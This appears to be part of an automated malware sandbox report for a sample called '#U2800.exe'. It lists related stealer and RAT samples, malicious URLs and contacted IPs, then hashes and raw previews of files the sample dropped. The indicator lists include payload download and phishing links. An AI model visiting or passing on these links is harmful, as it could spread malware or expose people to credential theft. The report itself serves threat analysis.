                                                                                                                                                                                                        resembleC2.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                                                                                                        • ip-api.com/json/?fields=225545
                                                                                                                                                                                                        F0DgoRk0p1.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                        • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                        fpY3HP2cnH.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                        • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                        4287eV6mBc.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                        • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                        aik1mr9TOq.exeGet hashmaliciousPredatorBrowse
                                                                                                                                                                                                        • ip-api.com/json/
                                                                                                                                                                                                        DUWPFaZd3a.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                                                                                                                                                        • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                        172.65.251.78build_setup.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                        • gitlab.com/greg201/ppi3/-/raw/main/Setup.exe?inline=false
                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                        gitlab.comhnskdfgjgar22.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                                        hnsadjhfg18De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                                        slifdgjsidfg19.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                                        De17De16.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                                        fghdsdf17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                                        hnghksdjfhs19De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                                        jhsdgfjkh236.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                                        kjhsdgGarmin17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                                        hngadsfkgj17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                                        hsfgdf17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                                        ip-api.comrordendecompra_.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                        findme.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                        tasAgNgjbJ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                        Solara.exeGet hashmaliciousPython Stealer, Exela Stealer, XmrigBrowse
                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                        resembleC2.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                        F0DgoRk0p1.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                        fpY3HP2cnH.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                        4287eV6mBc.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                        aik1mr9TOq.exeGet hashmaliciousPredatorBrowse
                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                        DUWPFaZd3a.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                        api.ipify.org009.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                        • 104.26.12.205
                                                                                                                                                                                                        http://bebizicon.com/Campususa/index.xml#?email=b2xpdmllci5kb3phdEBpbm5vY2FwLmNvbQ==Get hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                                                                                                                                        • 172.67.74.152
                                                                                                                                                                                                        https://runescape.games/usernames.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 104.26.13.205
                                                                                                                                                                                                        rRef6010273.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                        • 172.67.74.152
                                                                                                                                                                                                        invnoIL438805.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                        • 172.67.74.152
                                                                                                                                                                                                        Shipping Docs Waybill No 2009 xxxx 351.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                        • 104.26.13.205
                                                                                                                                                                                                        rCHARTERREQUEST.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                        • 104.26.12.205
                                                                                                                                                                                                        http://clumsy-sulky-helium.glitch.me/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 104.26.12.205
                                                                                                                                                                                                        gem1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                        • 104.26.13.205
                                                                                                                                                                                                        gem2.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 104.26.12.205
                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                        CLOUDFLARENETUShttp://www.pentamx.com/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                                                        • 1.1.1.1
                                                                                                                                                                                                        PO 2025918 pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                                        ABG Draft.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                        • 104.21.64.1
                                                                                                                                                                                                        RENH3RE2025QUOTE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                        • 104.21.80.1
                                                                                                                                                                                                        https://web.oncentrl.com/#/index/action?entityType=PUBLISHEDQUESTIONNAIRE&entityId=134955&actionType=PUBLISH&context=CLIENT_MGMT&recieverUserInfoId=68822Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 104.17.25.14
                                                                                                                                                                                                        random.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 104.21.96.1
                                                                                                                                                                                                        https://akirapowered84501.emlnk.com/lt.php?x=3DZy~GDLVnab5KCs-Nu4WOae1qEoiN9xvxk1XaPMVXahD5B9-Uy.xuG-142imNHGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 104.17.205.31
                                                                                                                                                                                                        https://clients.dedicatedservicesusa.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 1.1.1.1
                                                                                                                                                                                                        Scanned-IMGS_from NomanGroup IDT.scr.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • 104.21.3.193
                                                                                                                                                                                                        Remittance.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 104.16.100.29
                                                                                                                                                                                                        CLOUDFLARENETUShttp://www.pentamx.com/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                                                        • 1.1.1.1
                                                                                                                                                                                                        PO 2025918 pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                                        ABG Draft.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                        • 104.21.64.1
                                                                                                                                                                                                        RENH3RE2025QUOTE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                        • 104.21.80.1
                                                                                                                                                                                                        https://web.oncentrl.com/#/index/action?entityType=PUBLISHEDQUESTIONNAIRE&entityId=134955&actionType=PUBLISH&context=CLIENT_MGMT&recieverUserInfoId=68822Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 104.17.25.14
                                                                                                                                                                                                        random.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 104.21.96.1
                                                                                                                                                                                                        https://akirapowered84501.emlnk.com/lt.php?x=3DZy~GDLVnab5KCs-Nu4WOae1qEoiN9xvxk1XaPMVXahD5B9-Uy.xuG-142imNHGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 104.17.205.31
                                                                                                                                                                                                        https://clients.dedicatedservicesusa.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 1.1.1.1
                                                                                                                                                                                                        Scanned-IMGS_from NomanGroup IDT.scr.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • 104.21.3.193
                                                                                                                                                                                                        Remittance.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 104.16.100.29
                                                                                                                                                                                                        TUT-ASUSrordendecompra_.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                        findme.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                        tasAgNgjbJ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                        Solara.exeGet hashmaliciousPython Stealer, Exela Stealer, XmrigBrowse
                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                        resembleC2.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                        F0DgoRk0p1.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                        fpY3HP2cnH.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                        4287eV6mBc.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                        aik1mr9TOq.exeGet hashmaliciousPredatorBrowse
                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                        DUWPFaZd3a.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                        3b5074b1b5d032e5620f69f9f700ff0epdf_2025 QUOTATION - #202401146778.pdf (83kb).com.exeGet hashmaliciousPureLog Stealer, QuasarBrowse
                                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                                        • 142.250.185.206
                                                                                                                                                                                                        • 142.250.185.228
                                                                                                                                                                                                        • 104.26.13.205
                                                                                                                                                                                                        12.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                                        • 142.250.185.206
                                                                                                                                                                                                        • 142.250.185.228
                                                                                                                                                                                                        • 104.26.13.205
                                                                                                                                                                                                        https://cys-bombasml.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                                        • 142.250.185.206
                                                                                                                                                                                                        • 142.250.185.228
                                                                                                                                                                                                        • 104.26.13.205
                                                                                                                                                                                                        UoEDaAjHGW.exeGet hashmaliciousPureLog Stealer, QuasarBrowse
                                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                                        • 142.250.185.206
                                                                                                                                                                                                        • 142.250.185.228
                                                                                                                                                                                                        • 104.26.13.205
                                                                                                                                                                                                        009.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                                        • 142.250.185.206
                                                                                                                                                                                                        • 142.250.185.228
                                                                                                                                                                                                        • 104.26.13.205
                                                                                                                                                                                                        RFQ.exeGet hashmaliciousQuasar, PureLog StealerBrowse
                                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                                        • 142.250.185.206
                                                                                                                                                                                                        • 142.250.185.228
                                                                                                                                                                                                        • 104.26.13.205
                                                                                                                                                                                                        PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                                        • 142.250.185.206
                                                                                                                                                                                                        • 142.250.185.228
                                                                                                                                                                                                        • 104.26.13.205
                                                                                                                                                                                                        https://performancemanager10.successfactors.com/sf/hrisworkflowapprovelink?workflowRequestId=V4-0-a1-iHQRWD3bQis7XhhWNKzjfWwnvURbEsN0CxUc27Zt3ml0ag&company=oceanagoldT2&username=dave.oliver@oceanagold.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                                        • 142.250.185.206
                                                                                                                                                                                                        • 142.250.185.228
                                                                                                                                                                                                        • 104.26.13.205
                                                                                                                                                                                                        https://imtcoken.im/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                                        • 142.250.185.206
                                                                                                                                                                                                        • 142.250.185.228
                                                                                                                                                                                                        • 104.26.13.205
                                                                                                                                                                                                        https://ipfs.io/ipfs/bafkreidfpb2invnj4i76skys5sfmk3hycbkxhquyb7d6uhnbls3gwf4a5qGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                                        • 142.250.185.206
                                                                                                                                                                                                        • 142.250.185.228
                                                                                                                                                                                                        • 104.26.13.205
                                                                                                                                                                                                        No context
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):751624
                                                                                                                                                                                                        Entropy (8bit):4.941596949315087
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:5CgixLwQcUHW0tKouM4kD+nRzkSv9N+VYuhras4V:AgixLIUHW0tK7MmkSv9w/tas4
                                                                                                                                                                                                        MD5:FBF37B8B1EE4640B1C470F2F07A80E4A
                                                                                                                                                                                                        SHA1:B239C5499FA63D397C3DD35A7F605CE86D91B44B
                                                                                                                                                                                                        SHA-256:E21DB717F31F9465420E6354BAA5AFAEAA3521DEB885ED46BC90530AEE9FFD20
                                                                                                                                                                                                        SHA-512:F9439E2D7B63825FE812EE380F1EF8B277D50EED706B6ABE4B8563423891FF425A00083E88626084EE493376F1DA742ECD73B6B5F892E001C4F9048C7D3AC36C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:HwCompat V4....1394.inf:..PCI\CC_0C0010..PCI\VEN_10CF&CC_0C0010..PCI\VEN_11C1&CC_0C0010..PCI\VEN_100B&DEV_000F..PCI\VEN_100B&CC_0C0010..PCI\VEN_1033&DEV_0063..PCI\VEN_1033&CC_0C0010..PCI\VEN_1180&CC_0C0010..PCI\VEN_104D&DEV_8039..PCI\VEN_104D&DEV_8039&REV_03..PCI\VEN_104C&DEV_8009..PCI\VEN_104C&DEV_8019..PCI\VEN_104C&CC_0C0010..PCI\VEN_104C&DEV_8009&SUBSYS_8032104D..PCI\VEN_1106&DEV_3044..PCI\VEN_1106&CC_0C0010....3ware.inf:..PCI\VEN_13C1&DEV_1010&SUBSYS_000113C1....55fpgafirmware.inf:..UEFI\RES_{C907D5F6-BBE9-47EE-B76B-5E28C7F9FC63}....55niosfirmware.inf:..UEFI\RES_{06B75ADA-B0E1-46BA-BB3B-4D6E4A0F2CB1}....55smcappfirmware.inf:..UEFI\RES_{364D032C-0041-48A6-A26F-62388D97FC6C}....55smcbootfirmware.inf:..UEFI\RES_{DA50CBA0-8F33-4B66-8A3A-08F84015C33F}....55stguestfirmware.inf:..UEFI\RES_{4E11B2F5-AF26-49D5-A549-72AE52345E22}....55stoutfirmware.inf:..UEFI\RES_{7E2BEABF-4BE5-4C10-AF9C-4C1A69E06033}....55stpcfirmware.inf:..UEFI\RES_{296EFE23-EB18-42EE-8B12-51489B27232A}....55sttouchbackgue
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):95768
                                                                                                                                                                                                        Entropy (8bit):7.998229577844797
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:1536:zYXuYiqAVUJZ84XkiGc3yWeV6N5opMBlY0f4y+DiWkks8hRG0paY1xvM+8EtTpUU:zY+Yiq1ZNXki54V0ZBrnhkjppp1++vtb
                                                                                                                                                                                                        MD5:4DD42E959B2D69E0580CCD710BB0A26C
                                                                                                                                                                                                        SHA1:DB84D5EDF8639493FDE55C9CD6371410C35B15AC
                                                                                                                                                                                                        SHA-256:AAFA9346428DD277C96F7C1B7BF8E374D03363AFC28872D10CBA3597C63DCE19
                                                                                                                                                                                                        SHA-512:06687F8EC0310D0278E1FD591215C6168BEF7F24D9CC860186076016A2FAF0AC522DA8BDD78D097F7EAF4053CB00789EBCD9DE02FE95DC5C2D5C22DEDFD3032D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:PK..-......5.Z.8n~............D/hwcompat.txt.....x......Zu..............k......#o.f..u.R.......r.:.8 m.2..~Gz...Q].K.8-...Z.B....v.\m....A...M.\K.....h.-.F......@.5K*>.Z....f.Z.M.?..?s.\.l[...C.T....O..UN..I......}....47..0.O.0..Dq...g.......(..._u.E{.K.l...........L.......J.1.>.~....q...AD,.{....!&.@...I.s...$..|w...l....k.+..2.B-..\.Gd$. .......J+w............=".-OFO.........}.........l...Z.HYN.F..G6..........fT^hy..ep.iN.Jf..,..}SZ.;$......F.....h*K5E.=......D.t.$..A....r..........cB....<..)...X...=..N..u...F....v.A...L=..w../9.....P.-...l5...m...x4.7..3&.........;.`...g..e..MZ.......~..me.D.v.mW,?.$.t...|.._.:4...uj...(..t...$-....j.*..s....*.q..%f..&.......WW^K6."K...L......Z..T...=.Q..V^Y.s../.w.W....t...IJ..0....F._R..j....J.S....o..v7J.L.........J{.........%.p8+':....i......J.%1.....c......^.}$L...T;}...........ZW$.5..p.].t...u..P...>.*..+.r0x.p....L..j....e....X#.4........ak.Y..I1|.Y/.. t...].h..AP.....q.?......b.kW.._./.
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):280
                                                                                                                                                                                                        Entropy (8bit):0.7403664744478247
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:FiWXlv9U:Lv
                                                                                                                                                                                                        MD5:99BBE027A67D5B8E84C910F7C77709D2
                                                                                                                                                                                                        SHA1:372EFA7431F8EECFC4247C810131CB6928E50AC3
                                                                                                                                                                                                        SHA-256:0F27051CF1DA3BBA983425A45ED2DE291E43491E0A982844D92C5B92AF34FCAE
                                                                                                                                                                                                        SHA-512:E3970DEFF941FE95016F731651C7C234FF4AD27B54317BE44B4292F050E2A4B9ACACFF103837ADFC94999F9B534098231204C26D9BBDF47412CFE09C50F77BE7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:sdPC......................5.y&.K.?....................................................................................................................................................................................................................................................
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                        Size (bytes):59
                                                                                                                                                                                                        Entropy (8bit):4.4420715500450445
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:iDUSuy4WR6dU8BfiXRIn:iDU5a6dU+t
                                                                                                                                                                                                        MD5:6515A64E810291D71007AD8DF9A50D0D
                                                                                                                                                                                                        SHA1:9ABE11DB0592485D98B4A6088ACB7138A79D85F7
                                                                                                                                                                                                        SHA-256:7D70E70E15783FDFB601B2175448D31343986502234AC64A7C22F81A923E6868
                                                                                                                                                                                                        SHA-512:7EA1104F1ACEA86BBD7F8B6B193804D15CC270DBD541ADD5C1A0765ACCF2AF50AD768832764FB1D6C5610C489193125C2CBF55562F9FD308B143BBEEBED3552A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:9626./devtools/browser/3616c134-b8cf-4888-affb-ccd35e00386a
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 15 x 15
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):663
                                                                                                                                                                                                        Entropy (8bit):5.949125862393289
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:PlrojAxh4bxdtT/CS3wkxWHMGBJg8E8gKVYQezuYEecp:trPsTTaWKbBCgVqSF
                                                                                                                                                                                                        MD5:ED3C1C40B68BA4F40DB15529D5443DEC
                                                                                                                                                                                                        SHA1:831AF99BB64A04617E0A42EA898756F9E0E0BCCA
                                                                                                                                                                                                        SHA-256:039FE79B74E6D3D561E32D4AF570E6CA70DB6BB3718395BE2BF278B9E601279A
                                                                                                                                                                                                        SHA-512:C7B765B9AFBB9810B6674DBC5C5064ED96A2682E78D5DFFAB384D81EDBC77D01E0004F230D4207F2B7D89CEE9008D79D5FBADC5CB486DA4BC43293B7AA878041
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:GIF89a....w..!..MSOFFICE9.0.....sRGB......!..MSOFFICE9.0.....msOPMSOFFICE9.0Dn&P3.!..MSOFFICE9.0.....cmPPJCmp0712.........!.......,....................'..;..b...RQ.xx..................,+................................yy..;..b.........................qp.bb..........uv.ZZ.LL.......xw.jj.NN.A@....zz.mm.^_.........yw........yx.xw.RR.,*.++............................................................................................................................................................................................................8....>.......................4567...=..../0123.....<9:.()*+,-.B.@...."#$%&'....... !............C.?....A;<...HT(..;
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2061), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2061
                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkl:Yf
                                                                                                                                                                                                        MD5:3B31B0025D33EAB74815E2AFD5A2505E
                                                                                                                                                                                                        SHA1:71F53C83810A899DDAAAF0AE9AA0275CE1502A3A
                                                                                                                                                                                                        SHA-256:4E6F828823400799FC7131FD80406D0CB7FB9914F0EE4AF1A845F9846C2D114E
                                                                                                                                                                                                        SHA-512:D2F9FFFB058A2A05699030EB78E84DA441209251C2BC167A886938F9E0D62D2039183DC82D4C48E09EA04D6D0B8D51F35B69E7642FB6A20D3A9708A56FD575AF
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1424), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1424
                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:WttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkA:Y+
                                                                                                                                                                                                        MD5:9C58180068A4299840B239A6DEC8F8EC
                                                                                                                                                                                                        SHA1:680A336859220AD29E17581B269CFD3DF700F450
                                                                                                                                                                                                        SHA-256:58107354C1EF7B6001AE5D9E2BBC48501EDB45DAE7C28DAA866E084B588ABAA2
                                                                                                                                                                                                        SHA-512:44A7E19A9C0A4A907F77391BB46DEE23C2F8E06758BB03CF8525BD8DD2F8014838DD70B064A398F5A14E9B1483F3E113C353D34579E80766D138D717F173BFE3
                                                                                                                                                                                                        Malicious:false
